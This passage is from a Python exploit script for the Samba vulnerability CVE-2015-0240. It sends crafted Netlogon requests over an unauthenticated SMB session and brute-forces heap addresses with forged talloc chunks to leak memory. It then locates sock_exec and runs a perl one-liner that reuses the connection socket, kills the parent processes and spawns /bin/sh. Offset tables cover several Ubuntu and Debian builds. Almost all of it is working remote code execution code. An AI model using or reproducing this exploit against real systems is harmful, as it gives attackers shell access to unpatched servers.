self.serverName.fields['ReferentID'] = 0\r\n \r\n self.accountName = WSTR()\r\n \r\n request = Requester.NetrServerPasswordSet()\r\n request['PrimaryName'] = self.serverName\r\n request['AccountName'] = self.accountName\r\n request['SecureChannelType'] = 
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel\r\n request['ComputerName'] = '\\x00'\r\n request['Authenticator'] = authenticator\r\n request['UasNewPassword'] = uasNewPass\r\n self.request = request\r\n \r\n def set_target(self, target):\r\n self.target = target\r\n \r\n def set_payload(self, s, pad_to_size=0):\r\n if pad_to_size > 0:\r\n s += '\\x00'*(pad_to_size-len(s))\r\n pad_size = 0\r\n if len(s) < (16*1024+1):\r\n ofsize = (len(s)+self.req_presize) % self.netlogon_data_fragment_size\r\n if ofsize > 0:\r\n pad_size = self.netlogon_data_fragment_size - ofsize\r\n \r\n self.accountName.fields['Data'] = s+'\\x00'*pad_size+'\\x00\\x00'\r\n self.accountName.fields['MaximumCount'] = None\r\n self.accountName.fields['ActualCount'] = None\r\n self.accountName.data = None # force recompute\r\n \r\n set_accountNameData = set_payload\r\n \r\n def get_dce(self):\r\n if self.dce is None or self.dce.lostconn:\r\n rpctransport = transport.DCERPCTransportFactory(r'ncacn_np:%s[\\PIPE\\netlogon]' % self.target)\r\n rpctransport.set_credentials('','') # NULL session\r\n rpctransport.set_dport(445)\r\n # force to 'NT LM 0.12' only\r\n rpctransport.preferred_dialect('NT LM 0.12')\r\n \r\n self.dce = rpctransport.get_dce_rpc()\r\n self.dce.connect()\r\n self.dce.bind(nrpc.MSRPC_UUID_NRPC)\r\n self.dce.lostconn = False\r\n return self.dce\r\n \r\n def get_socket(self):\r\n return self.dce.get_rpc_transport().get_socket()\r\n \r\n def force_dce_disconnect(self):\r\n if not (self.dce is None or self.dce.lostconn):\r\n self.get_socket().close()\r\n self.dce.lostconn = True\r\n \r\n def request_addr(self, addr):\r\n self.serverName.fields['ReferentID'] = addr\r\n \r\n dce = self.get_dce()\r\n try:\r\n dce.call(self.request.opnum, self.request)\r\n answer = dce.recv()\r\n return unpack(\"<IIII\", answer)\r\n except impacket.nmb.NetBIOSError as e:\r\n if e.args[0] != 'Error while reading from remote':\r\n raise\r\n dce.lostconn = True\r\n return None\r\n \r\n # call with no 
read\r\n def call_addr(self, addr):\r\n self.serverName.fields['ReferentID'] = addr\r\n \r\n dce = self.get_dce()\r\n try:\r\n dce.call(self.request.opnum, self.request)\r\n return True\r\n except impacket.nmb.NetBIOSError as e:\r\n if e.args[0] != 'Error while reading from remote':\r\n raise\r\n dce.lostconn = True\r\n return False\r\n \r\n def force_recv(self):\r\n dce = self.get_dce()\r\n return dce.get_rpc_transport().recv(forceRecv=True)\r\n \r\n def request_check_valid_addr(self, addr):\r\n answers = self.request_addr(addr)\r\n if answers is None:\r\n return False # connection lost\r\n elif answers[3] != 0:\r\n return True # error, expected\r\n else:\r\n raise Error('Unexpected result')\r\n \r\n \r\n# talloc constants\r\nTALLOC_MAGIC = 0xe8150c70 # for talloc 2.0\r\nTALLOC_FLAG_FREE = 0x01\r\nTALLOC_FLAG_LOOP = 0x02\r\nTALLOC_FLAG_POOL = 0x04\r\nTALLOC_FLAG_POOLMEM = 0x08\r\n \r\nTALLOC_HDR_SIZE = 0x30 # for 32 bit\r\n \r\nflag_loop = TALLOC_MAGIC | TALLOC_FLAG_LOOP # for checking valid address\r\n \r\n# Note: do NOT reduce target_payload_size less than 8KB. 4KB is too small buffer. 
cannot predict address.\r\nTARGET_PAYLOAD_SIZE = 8192\r\n \r\n########\r\n# request helper functions\r\n########\r\n \r\n# only one global requester\r\nrequester = Requester()\r\n \r\ndef force_dce_disconnect():\r\n requester.force_dce_disconnect()\r\n \r\ndef request_addr(addr):\r\n return requester.request_addr(addr)\r\n \r\ndef request_check_valid_addr(addr):\r\n return requester.request_check_valid_addr(addr)\r\n \r\ndef set_payload(s, pad_to_size=0):\r\n requester.set_payload(s, pad_to_size)\r\n \r\ndef get_socket():\r\n return requester.get_socket()\r\n \r\ndef call_addr(addr):\r\n return requester.call_addr(addr)\r\n \r\ndef force_recv():\r\n return requester.force_recv()\r\n \r\n########\r\n# find heap address\r\n########\r\n \r\n# only refs MUST be NULL, other never be checked\r\nfake_chunk_find_heap = pack(\"<IIIIIIII\",\r\n 0, 0, 0, 0, # refs\r\n flag_loop, flag_loop, flag_loop, flag_loop,\r\n)\r\n \r\ndef find_valid_heap_addr(start_addr, stop_addr, payload_size, first=False):\r\n \"\"\"\r\n below code can be used for checking valid heap address (no crash)\r\n \r\n if (unlikely(tc->flags & TALLOC_FLAG_LOOP)) {\r\n /* we have a free loop - stop looping */\r\n return 0;\r\n }\r\n \"\"\"\r\n global fake_chunk_find_heap\r\n payload = fake_chunk_find_heap*(payload_size/len(fake_chunk_find_heap))\r\n set_payload(payload)\r\n addr_step = payload_size\r\n addr = start_addr\r\n i = 0\r\n while addr > stop_addr:\r\n if i == 16:\r\n print(\" [*]trying addr: {:x}\".format(addr))\r\n i = 0\r\n \r\n if request_check_valid_addr(addr):\r\n return addr\r\n if first:\r\n # first time, the last 16 bit is still do not know\r\n # have to do extra check\r\n if request_check_valid_addr(addr+0x10):\r\n return addr+0x10\r\n addr -= addr_step\r\n i += 1\r\n return None\r\n \r\ndef find_valid_heap_exact_addr(addr, payload_size):\r\n global fake_chunk_find_heap\r\n fake_size = payload_size // 2\r\n while fake_size >= len(fake_chunk_find_heap):\r\n payload = 
fake_chunk_find_heap*(fake_size/len(fake_chunk_find_heap))\r\n set_payload(payload, payload_size)\r\n if not request_check_valid_addr(addr):\r\n addr -= fake_size\r\n fake_size = fake_size // 2\r\n \r\n set_payload('\\x00'*16 + pack(\"<I\", flag_loop), payload_size)\r\n # because glibc heap is align by 8\r\n # so the last 4 bit of address must be 0x4 or 0xc\r\n if request_check_valid_addr(addr-4):\r\n addr -= 4\r\n elif request_check_valid_addr(addr-0xc):\r\n addr -= 0xc\r\n else:\r\n print(\" [-] bad exact addr: {:x}\".format(addr))\r\n return 0\r\n \r\n print(\" [*] checking exact addr: {:x}\".format(addr))\r\n \r\n if (addr & 4) == 0:\r\n return 0\r\n \r\n # test the address\r\n \r\n # must be invalid (refs is AccountName.ActualCount)\r\n set_payload('\\x00'*12 + pack(\"<I\", flag_loop), payload_size)\r\n if request_check_valid_addr(addr-4):\r\n print(' [-] request_check_valid_addr(addr-4) failed')\r\n return 0\r\n # must be valid (refs is AccountName.Offset)\r\n # do check again if fail. sometimes heap layout is changed\r\n set_payload('\\x00'*8 + pack(\"<I\", flag_loop), payload_size)\r\n if not request_check_valid_addr(addr-8) and not request_check_valid_addr(addr-8) :\r\n print(' [-] request_check_valid_addr(addr-8) failed')\r\n return 0\r\n # must be invalid (refs is AccountName.MaxCount)\r\n set_payload('\\x00'*4 + pack(\"<I\", flag_loop), payload_size)\r\n if request_check_valid_addr(addr-0xc):\r\n print(' [-] request_check_valid_addr(addr-0xc) failed')\r\n return 0\r\n # must be valid (refs is ServerHandle.ActualCount)\r\n # do check again if fail. 
sometimes heap layout is changed\r\n set_payload(pack(\"<I\", flag_loop), payload_size)\r\n if not request_check_valid_addr(addr-0x10) and not request_check_valid_addr(addr-0x10):\r\n print(' [-] request_check_valid_addr(addr-0x10) failed')\r\n return 0\r\n \r\n return addr\r\n \r\ndef find_payload_addr(start_addr, start_payload_size, target_payload_size):\r\n print('[*] bruteforcing heap address...')\r\n \r\n start_addr = start_addr & 0xffff0000\r\n \r\n heap_addr = 0\r\n while heap_addr == 0:\r\n # loop from max to 0xb7700000 for finding heap area\r\n # offset 0x20000 is minimum offset from heap start to recieved data in heap\r\n stop_addr = 0xb7700000 + 0x20000\r\n good_addr = None\r\n payload_size = start_payload_size\r\n while payload_size >= target_payload_size:\r\n force_dce_disconnect()\r\n found_addr = None\r\n for i in range(3):\r\n found_addr = find_valid_heap_addr(start_addr, stop_addr, payload_size, good_addr is None)\r\n if found_addr is not None:\r\n break\r\n if found_addr is None:\r\n # failed\r\n good_addr = None\r\n break\r\n good_addr = found_addr\r\n print(\" [*] found valid addr ({:d}KB): {:x}\".format(payload_size//1024, good_addr))\r\n start_addr = good_addr\r\n stop_addr = good_addr - payload_size + 0x20\r\n payload_size //= 2\r\n \r\n if good_addr is not None:\r\n # try 3 times to find exact address. if address cannot be found, assume\r\n # minimizing payload size is not correct. 
start minimizing again\r\n for i in range(3):\r\n heap_addr = find_valid_heap_exact_addr(good_addr, target_payload_size)\r\n if heap_addr != 0:\r\n break\r\n force_dce_disconnect()\r\n \r\n if heap_addr == 0:\r\n print(' [-] failed to find payload adress')\r\n # start from last good address + some offset\r\n start_addr = (good_addr + 0x10000) & 0xffff0000\r\n print('[*] bruteforcing heap adress again from {:x}'.format(start_addr))\r\n \r\n payload_addr = heap_addr - len(fake_chunk_find_heap)\r\n print(\" [+] found payload addr: {:x}\".format(payload_addr))\r\n return payload_addr\r\n \r\n \r\n########\r\n# leak info\r\n########\r\n \r\ndef addr2utf_prefix(addr):\r\n def is_badchar(v):\r\n return (v >= 0xd8) and (v <= 0xdf)\r\n \r\n prefix = 0 # safe\r\n if is_badchar((addr)&0xff) or is_badchar((addr>>16)&0xff):\r\n prefix |= 2 # cannot have prefix\r\n if is_badchar((addr>>8)&0xff) or is_badchar((addr>>24)&0xff):\r\n prefix |= 1 # must have prefix\r\n return prefix\r\n \r\ndef leak_info_unlink(payload_addr, next_addr, prev_addr, retry=True, call_only=False):\r\n \"\"\"\r\n Note:\r\n - if next_addr and prev_addr are not zero, they must be writable address\r\n because of below code in _talloc_free_internal()\r\n if (tc->prev) tc->prev->next = tc->next;\r\n if (tc->next) tc->next->prev = tc->prev;\r\n \"\"\"\r\n # Note: U+D800 to U+DFFF is reserved (also bad char for samba)\r\n # check if '\\x00' is needed to avoid utf16 badchar\r\n prefix_len = addr2utf_prefix(next_addr) | addr2utf_prefix(prev_addr)\r\n if prefix_len == 3:\r\n return None # cannot avoid badchar\r\n if prefix_len == 2:\r\n prefix_len = 0\r\n \r\n fake_chunk_leak_info = pack(\"<IIIIIIIIIIII\",\r\n next_addr, prev_addr, # next, prev\r\n 0, 0, # parent, children\r\n 0, 0, # refs, destructor\r\n 0, 0, # name, size\r\n TALLOC_MAGIC | TALLOC_FLAG_POOL, # flag\r\n 0, 0, 0, # pool, pad, pad\r\n )\r\n payload = '\\x00'*prefix_len+fake_chunk_leak_info + pack(\"<I\", 0x80000) # pool_object_count\r\n 
set_payload(payload, TARGET_PAYLOAD_SIZE)\r\n if call_only:\r\n return call_addr(payload_addr + TALLOC_HDR_SIZE + prefix_len)\r\n \r\n for i in range(3 if retry else 1):\r\n try:\r\n answers = request_addr(payload_addr + TALLOC_HDR_SIZE + prefix_len)\r\n except impacket.dcerpc.v5.rpcrt.Exception:\r\n print(\"impacket.dcerpc.v5.rpcrt.Exception\")\r\n answers = None\r\n force_dce_disconnect()\r\n if answers is not None:\r\n # leak info must have next or prev address\r\n if (answers[1] == prev_addr) or (answers[0] == next_addr):\r\n break\r\n #print('{:x}, {:x}, {:x}, {:x}'.format(answers[0], answers[1], answers[2], answers[3]))\r\n answers = None # no next or prev in answers => wrong answer\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n \r\n return answers\r\n \r\ndef leak_info_addr(payload_addr, r_out_addr, leak_addr, retry=True):\r\n # leak by replace r->out.return_authenticator pointer\r\n # Note: because leak_addr[4:8] will be replaced with r_out_addr\r\n # only answers[0] and answers[2] are leaked\r\n return leak_info_unlink(payload_addr, leak_addr, r_out_addr, retry)\r\n \r\ndef leak_info_addr2(payload_addr, r_out_addr, leak_addr, retry=True):\r\n # leak by replace r->out.return_authenticator pointer\r\n # Note: leak_addr[0:4] will be replaced with r_out_addr\r\n # only answers[1] and answers[2] are leaked\r\n return leak_info_unlink(payload_addr, r_out_addr-4, leak_addr-4, retry)\r\n \r\ndef leak_uint8t_addr(payload_addr, r_out_addr, chunk_addr):\r\n # leak name field ('uint8_t') in found heap chunk\r\n # do not retry this leak, because r_out_addr is guessed\r\n answers = leak_info_addr(payload_addr, r_out_addr, chunk_addr + 0x18, False)\r\n if answers is None:\r\n return None\r\n if answers[2] != TALLOC_MAGIC:\r\n force_dce_disconnect()\r\n return None\r\n \r\n return answers[0]\r\n \r\ndef leak_info_find_offset(info):\r\n # offset from pool to payload still does not know\r\n print(\"[*] guessing 'r' offset and leaking 'uint8_t' address 
...\")\r\n chunk_addr = info['chunk_addr']\r\n uint8t_addr = None\r\n r_addr = None\r\n r_out_addr = None\r\n while uint8t_addr is None:\r\n # 0x8c10 <= 4 + 0x7f88 + 0x2044 - 0x13c0\r\n # 0x9ce0 <= 4 + 0x7f88 + 0x10d0 + 0x2044 - 0x13c0\r\n # 0xadc8 <= 4 + 0x7f88 + 0x10e8 + 0x10d0 + 0x2044 - 0x13c0\r\n # 0xad40 is extra offset when no share on debian\r\n # 0x10d38 is extra offset when only [printers] is shared on debian\r\n for offset in (0x8c10, 0x9ce0, 0xadc8, 0xad40, 0x10d38):\r\n r_addr = chunk_addr - offset\r\n # 0x18 is out.authenticator offset\r\n r_out_addr = r_addr + 0x18\r\n print(\" [*] try 'r' offset 0x{:x}, r_out addr: 0x{:x}\".format(offset, r_out_addr))\r\n \r\n uint8t_addr = leak_uint8t_addr(info['payload_addr'], r_out_addr, chunk_addr)\r\n if uint8t_addr is not None:\r\n print(\" [*] success\")\r\n break\r\n print(\" [-] failed\")\r\n if uint8t_addr is None:\r\n return False\r\n \r\n info['uint8t_addr'] = uint8t_addr\r\n info['r_addr'] = r_addr\r\n info['r_out_addr'] = r_out_addr\r\n info['pool_addr'] = r_addr - 0x13c0\r\n \r\n print(\" [+] text 'uint8_t' addr: {:x}\".format(info['uint8t_addr']))\r\n print(\" [+] pool addr: {:x}\".format(info['pool_addr']))\r\n \r\n return True\r\n \r\ndef leak_sock_fd(info):\r\n # leak sock fd from\r\n # smb_request->sconn->sock\r\n # (offset: ->0x3c ->0x0 )\r\n print(\"[*] leaking socket fd ...\")\r\n info['smb_request_addr'] = info['pool_addr']+0x11a0\r\n print(\" [*] smb request addr: {:x}\".format(info['smb_request_addr']))\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['smb_request_addr']+0x3c-4)\r\n if answers is None:\r\n print(' [-] cannot leak sconn_addr address :(')\r\n return None\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n sconn_addr = answers[2]\r\n info['sconn_addr'] = sconn_addr\r\n print(' [+] sconn addr: {:x}'.format(sconn_addr))\r\n \r\n # write in padding of chunk, no need to disconnect\r\n answers = leak_info_addr2(info['payload_addr'], 
info['r_out_addr'], sconn_addr)\r\n if answers is None:\r\n print('cannot leak sock_fd address :(')\r\n return None\r\n sock_fd = answers[1]\r\n print(' [+] sock fd: {:d}'.format(sock_fd))\r\n info['sock_fd'] = sock_fd\r\n return sock_fd\r\n \r\ndef leak_talloc_pop_addr(info):\r\n # leak destructor talloc_pop() address\r\n # overwrite name field, no need to disconnect\r\n print('[*] leaking talloc_pop address')\r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], info['pool_addr'] + 0x14)\r\n if answers is None:\r\n print(' [-] cannot leak talloc_pop() address :(')\r\n return None\r\n if answers[2] != 0x2010: # chunk size must be 0x2010\r\n print(' [-] cannot leak talloc_pop() address. answers[2] is wrong :(')\r\n return None\r\n talloc_pop_addr = answers[0]\r\n print(' [+] talloc_pop addr: {:x}'.format(talloc_pop_addr))\r\n info['talloc_pop_addr'] = talloc_pop_addr\r\n return talloc_pop_addr\r\n \r\ndef leak_smbd_server_connection_handler_addr(info):\r\n # leak address from\r\n # smbd_server_connection.smb1->fde ->handler\r\n # (offset: ->0x9c->0x14 )\r\n # MUST NOT disconnect after getting smb1_fd_event address\r\n print('[*] leaking smbd_server_connection_handler address')\r\n def real_leak_conn_handler_addr(info):\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['sconn_addr'] + 0x9c)\r\n if answers is None:\r\n print(' [-] cannot leak smb1_fd_event address :(')\r\n return None\r\n smb1_fd_event_addr = answers[1]\r\n print(' [*] smb1_fd_event addr: {:x}'.format(smb1_fd_event_addr))\r\n \r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], smb1_fd_event_addr+0x14)\r\n if answers is None:\r\n print(' [-] cannot leak smbd_server_connection_handler address :(')\r\n return None\r\n force_dce_disconnect() # heap is corrupted, disconnect it\r\n smbd_server_connection_handler_addr = answers[0]\r\n diff = info['talloc_pop_addr'] - smbd_server_connection_handler_addr\r\n if diff > 0x2000000 or diff < 0:\r\n 
print(' [-] get wrong smbd_server_connection_handler addr: {:x}'.format(smbd_server_connection_handler_addr))\r\n smbd_server_connection_handler_addr = None\r\n return smbd_server_connection_handler_addr\r\n \r\n smbd_server_connection_handler_addr = None\r\n while smbd_server_connection_handler_addr is None:\r\n smbd_server_connection_handler_addr = real_leak_conn_handler_addr(info)\r\n \r\n print(' [+] smbd_server_connection_handler addr: {:x}'.format(smbd_server_connection_handler_addr))\r\n info['smbd_server_connection_handler_addr'] = smbd_server_connection_handler_addr\r\n \r\n return smbd_server_connection_handler_addr\r\n \r\ndef find_smbd_base_addr(info):\r\n # estimate smbd_addr from talloc_pop\r\n if (info['talloc_pop_addr'] & 0xf) != 0 or (info['smbd_server_connection_handler_addr'] & 0xf) != 0:\r\n # code has no alignment\r\n start_addr = info['smbd_server_connection_handler_addr'] - 0x124000\r\n else:\r\n start_addr = info['smbd_server_connection_handler_addr'] - 0x130000\r\n start_addr = start_addr & 0xfffff000\r\n stop_addr = start_addr - 0x20000\r\n \r\n print('[*] finding smbd loaded addr ...')\r\n while True:\r\n smbd_addr = start_addr\r\n while smbd_addr >= stop_addr:\r\n if addr2utf_prefix(smbd_addr-8) == 3:\r\n # smbd_addr is 0xb?d?e000\r\n test_addr = smbd_addr - 0x800 - 4\r\n else:\r\n test_addr = smbd_addr - 8\r\n # test writable on test_addr\r\n answers = leak_info_addr(info['payload_addr'], 0, test_addr, retry=False)\r\n if answers is not None:\r\n break\r\n smbd_addr -= 0x1000 # try prev page\r\n if smbd_addr > stop_addr:\r\n break\r\n print(' [-] failed. 
try again.')\r\n \r\n info['smbd_addr'] = smbd_addr\r\n print(' [+] found smbd loaded addr: {:x}'.format(smbd_addr))\r\n \r\ndef dump_mem_call_addr(info, target_addr):\r\n # leak pipes_struct address from\r\n # smbd_server_connection->chain_fsp->fake_file_handle->private_data\r\n # (offset: ->0x48 ->0xd4 ->0x4 )\r\n # Note:\r\n # - MUST NOT disconnect because chain_fsp,fake_file_handle,pipes_struct address will be changed\r\n # - target_addr will be replaced with current_pdu_sent address\r\n # check read_from_internal_pipe() in source3/rpc_server/srv_pipe_hnd.c\r\n print(' [*] overwrite current_pdu_sent for dumping memory ...')\r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], info['smb_request_addr'] + 0x48)\r\n if answers is None:\r\n print(' [-] cannot leak chain_fsp address :(')\r\n return False\r\n chain_fsp_addr = answers[1]\r\n print(' [*] chain_fsp addr: {:x}'.format(chain_fsp_addr))\r\n \r\n answers = leak_info_addr(info['payload_addr'], info['r_out_addr'], chain_fsp_addr+0xd4, retry=False)\r\n if answers is None:\r\n print(' [-] cannot leak fake_file_handle address :(')\r\n return False\r\n fake_file_handle_addr = answers[0]\r\n print(' [*] fake_file_handle addr: {:x}'.format(fake_file_handle_addr))\r\n \r\n answers = leak_info_addr2(info['payload_addr'], info['r_out_addr'], fake_file_handle_addr+0x4-0x4, retry=False)\r\n if answers is None:\r\n print(' [-] cannot leak pipes_struct address :(')\r\n return False\r\n pipes_struct_addr = answers[2]\r\n print(' [*] pipes_struct addr: {:x}'.format(pipes_struct_addr))\r\n \r\n current_pdu_sent_addr = pipes_struct_addr+0x84\r\n print(' [*] current_pdu_sent addr: {:x}'.format(current_pdu_sent_addr))\r\n # change pipes->out_data.current_pdu_sent to dump memory\r\n return leak_info_unlink(info['payload_addr'], current_pdu_sent_addr-4, target_addr, call_only=True)\r\n \r\ndef dump_smbd_find_bininfo(info):\r\n def recv_till_string(data, s):\r\n pos = len(data)\r\n while True:\r\n data += 
force_recv()\r\n if len(data) == pos:\r\n print('no more data !!!')\r\n return None\r\n p = data.find(s, pos-len(s))\r\n if p != -1:\r\n return (data, p)\r\n pos = len(data)\r\n return None\r\n \r\n def lookup_dynsym(dynsym, name_offset):\r\n addr = 0\r\n i = 0\r\n offset_str = pack(\"<I\", name_offset)\r\n while i < len(dynsym):\r\n if dynsym[i:i+4] == offset_str:\r\n addr = unpack(\"<I\", dynsym[i+4:i+8])[0]\r\n break\r\n i += 16\r\n return addr\r\n \r\n print('[*] dumping smbd ...')\r\n dump_call = False\r\n # have to minus from smbd_addr because code section is read-only\r\n if addr2utf_prefix(info['smbd_addr']-4) == 3:\r\n # smbd_addr is 0xb?d?e000\r\n dump_addr = info['smbd_addr'] - 0x800 - 4\r\n else:\r\n dump_addr = info['smbd_addr'] - 4\r\n for i in range(8):\r\n if dump_mem_call_addr(info, dump_addr):\r\n mem = force_recv()\r\n if len(mem) == 4280:\r\n dump_call = True\r\n break\r\n print(' [-] dump_mem_call_addr failed. try again')\r\n force_dce_disconnect()\r\n if not dump_call:\r\n print(' [-] dump smbd failed')\r\n return False\r\n \r\n print(' [+] dump success. 
getting smbd ...')\r\n # first time, remove any data before \\7fELF\r\n mem = mem[mem.index('\\x7fELF'):]\r\n \r\n mem, pos = recv_till_string(mem, '\\x00__gmon_start__\\x00')\r\n print(' [*] found __gmon_start__ at {:x}'.format(pos+1))\r\n \r\n pos = mem.rfind('\\x00\\x00', 0, pos-1)\r\n dynstr_offset = pos+1\r\n print(' [*] found .dynstr section at {:x}'.format(dynstr_offset))\r\n \r\n dynstr = mem[dynstr_offset:]\r\n mem = mem[:dynstr_offset]\r\n \r\n # find start of .dynsym section\r\n pos = len(mem) - 16\r\n while pos > 0:\r\n if mem[pos:pos+16] == '\\x00'*16:\r\n break\r\n pos -= 16 # sym entry size is 16 bytes\r\n if pos <= 0:\r\n print(' [-] found wrong .dynsym section at {:x}'.format(pos))\r\n return None\r\n dynsym_offset = pos\r\n print(' [*] found .dynsym section at {:x}'.format(dynsym_offset))\r\n dynsym = mem[dynsym_offset:]\r\n \r\n # find sock_exec\r\n dynstr, pos = recv_till_string(dynstr, '\\x00sock_exec\\x00')\r\n print(' [*] found sock_exec string at {:x}'.format(pos+1))\r\n sock_exec_offset = lookup_dynsym(dynsym, pos+1)\r\n print(' [*] sock_exec offset {:x}'.format(sock_exec_offset))\r\n \r\n #info['mem'] = mem # smbd data before .dynsym section\r\n info['dynsym'] = dynsym\r\n info['dynstr'] = dynstr # incomplete section\r\n info['sock_exec_addr'] = info['smbd_addr']+sock_exec_offset\r\n print(' [+] sock_exec addr: {:x}'.format(info['sock_exec_addr']))\r\n \r\n # Note: can continuing memory dump to find ROP\r\n \r\n force_dce_disconnect()\r\n \r\n########\r\n# code execution\r\n########\r\ndef call_sock_exec(info):\r\n prefix_len = addr2utf_prefix(info['sock_exec_addr'])\r\n if prefix_len == 3:\r\n return False # too bad... 
cannot call\r\n if prefix_len == 2:\r\n prefix_len = 0\r\n fake_talloc_chunk_exec = pack(\"<IIIIIIIIIIII\",\r\n 0, 0, # next, prev\r\n 0, 0, # parent, child\r\n 0, # refs\r\n info['sock_exec_addr'], # destructor\r\n 0, 0, # name, size\r\n TALLOC_MAGIC | TALLOC_FLAG_POOL, # flag\r\n 0, 0, 0, # pool, pad, pad\r\n )\r\n chunk = '\\x00'*prefix_len+fake_talloc_chunk_exec + info['cmd'] + '\\x00'\r\n set_payload(chunk, TARGET_PAYLOAD_SIZE)\r\n for i in range(3):\r\n if request_check_valid_addr(info['payload_addr']+TALLOC_HDR_SIZE+prefix_len):\r\n print('waiting for shell :)')\r\n return True\r\n print('something wrong :(')\r\n return False\r\n \r\n########\r\n# start work\r\n########\r\n \r\ndef check_exploitable():\r\n if request_check_valid_addr(0x41414141):\r\n print('[-] seems not vulnerable')\r\n return False\r\n if request_check_valid_addr(0):\r\n print('[+] seems exploitable :)')\r\n return True\r\n \r\n print(\"[-] seems vulnerable but I cannot exploit\")\r\n print(\"[-] I can exploit only if 'creds' is controlled by 'ReferentId'\")\r\n return False\r\n \r\ndef do_work(args):\r\n info = {}\r\n \r\n if not (args.payload_addr or args.heap_start or args.start_payload_size):\r\n if not check_exploitable():\r\n return\r\n \r\n start_size = 512*1024 # default size with 512KB\r\n if args.payload_addr:\r\n info['payload_addr'] = args.payload_addr\r\n else:\r\n heap_start = args.heap_start if args.heap_start else 0xb9800000+0x30000\r\n if args.start_payload_size:\r\n start_size = args.start_payload_size * 1024\r\n if start_size < TARGET_PAYLOAD_SIZE:\r\n start_size = 512*1024 # back to default\r\n info['payload_addr'] = find_payload_addr(heap_start, start_size, TARGET_PAYLOAD_SIZE)\r\n \r\n # the real talloc chunk address that stored the raw netlogon data\r\n # serverHandle 0x10 bytes. 
accountName 0xc bytes\r\n info['chunk_addr'] = info['payload_addr'] - 0x1c - TALLOC_HDR_SIZE\r\n print(\"[+] chunk addr: {:x}\".format(info['chunk_addr']))\r\n \r\n while not leak_info_find_offset(info):\r\n # Note: do heap bruteforcing again seems to be more effective\r\n # start from payload_addr + some offset\r\n print(\"[+] bruteforcing heap again. start from {:x}\".format(info['payload_addr']+0x10000))\r\n info['payload_addr'] = find_payload_addr(info['payload_addr']+0x10000, start_size, TARGET_PAYLOAD_SIZE)\r\n info['chunk_addr'] = info['payload_addr'] - 0x1c - TALLOC_HDR_SIZE\r\n print(\"[+] chunk addr: {:x}\".format(info['chunk_addr']))\r\n \r\n got_fd = leak_sock_fd(info)\r\n \r\n # create shell command for reuse sock fd\r\n cmd = \"perl -e 'use POSIX qw(dup2);$)=0;$>=0;\" # seteuid, setegid\r\n cmd += \"dup2({0:d},0);dup2({0:d},1);dup2({0:d},2);\".format(info['sock_fd']) # dup sock\r\n # have to kill grand-grand-parent process because sock_exec() does fork() then system()\r\n # the smbd process still receiving data from socket\r\n cmd += \"$z=getppid;$y=`ps -o ppid= $z`;$x=`ps -o ppid= $y`;kill 15,$x,$y,$z;\" # kill parents\r\n cmd += \"\"\"print \"shell ready\\n\";exec \"/bin/sh\";'\"\"\" # spawn shell\r\n info['cmd'] = cmd\r\n \r\n # Note: cannot use [email\u00a0protected] because binary is PIE and chunk dtor is called in libtalloc.\r\n # the ebx is not correct for resolving the system address\r\n smbd_info = {\r\n 0x5dd: { 'uint8t_offset': 0x711555, 'talloc_pop': 0x41a890, 'sock_exec': 0x0044a060, 'version': '3.6.3-2ubuntu2 - 3.6.3-2ubuntu2.3'},\r\n 0xb7d: { 'uint8t_offset': 0x711b7d, 'talloc_pop': 0x41ab80, 'sock_exec': 0x0044a380, 'version': '3.6.3-2ubuntu2.9'},\r\n 0xf7d: { 'uint8t_offset': 0x710f7d, 'talloc_pop': 0x419f80, 'sock_exec': 0x00449770, 'version': '3.6.3-2ubuntu2.11'},\r\n 0xf1d: { 'uint8t_offset': 0x71ff1d, 'talloc_pop': 0x429e80, 'sock_exec': 0x004614b0, 'version': '3.6.6-6+deb7u4'},\r\n }\r\n \r\n leak_talloc_pop_addr(info) # to 
double check the bininfo\r\n bininfo = smbd_info.get(info['uint8t_addr'] & 0xfff)\r\n if bininfo is not None:\r\n smbd_addr = info['uint8t_addr'] - bininfo['uint8t_offset']\r\n if smbd_addr + bininfo['talloc_pop'] == info['talloc_pop_addr']:\r\n # correct info\r\n print('[+] detect smbd version: {:s}'.format(bininfo['version']))\r\n info['smbd_addr'] = smbd_addr\r\n info['sock_exec_addr'] = smbd_addr + bininfo['sock_exec']\r\n print(' [*] smbd loaded addr: {:x}'.format(smbd_addr))\r\n print(' [*] use sock_exec offset: {:x}'.format(bininfo['sock_exec']))\r\n print(' [*] sock_exec addr: {:x}'.format(info['sock_exec_addr']))\r\n else:\r\n # wrong info\r\n bininfo = None\r\n \r\n got_shell = False\r\n if bininfo is None:\r\n # no target binary info. do a hard way to find them.\r\n \"\"\"\r\n leak smbd_server_connection_handler for 2 purposes\r\n - to check if compiler does code alignment\r\n - to estimate smbd loaded address\r\n - gcc always puts smbd_server_connection_handler() function at\r\n beginning area of .text section\r\n - so the difference of smbd_server_connection_handler() offset is\r\n very low for all smbd binary (compiled by gcc)\r\n \"\"\" \r\n leak_smbd_server_connection_handler_addr(info)\r\n find_smbd_base_addr(info)\r\n dump_smbd_find_bininfo(info)\r\n \r\n # code execution\r\n if 'sock_exec_addr' in info and call_sock_exec(info):\r\n s = get_socket()\r\n print(s.recv(4096)) # wait for 'shell ready' message\r\n s.send('uname -a\\n')\r\n print(s.recv(4096))\r\n s.send('id\\n')\r\n print(s.recv(4096))\r\n s.send('exit\\n')\r\n s.close()\r\n \r\n \r\ndef hex_int(x):\r\n return int(x,16)\r\n \r\n# command arguments\r\nparser = argparse.ArgumentParser(description='Samba CVE-2015-0240 exploit')\r\nparser.add_argument('target', help='target IP address')\r\nparser.add_argument('-hs', '--heap_start', type=hex_int,\r\n help='heap address in hex to start bruteforcing')\r\nparser.add_argument('-pa', '--payload_addr', type=hex_int,\r\n help='exact payload 
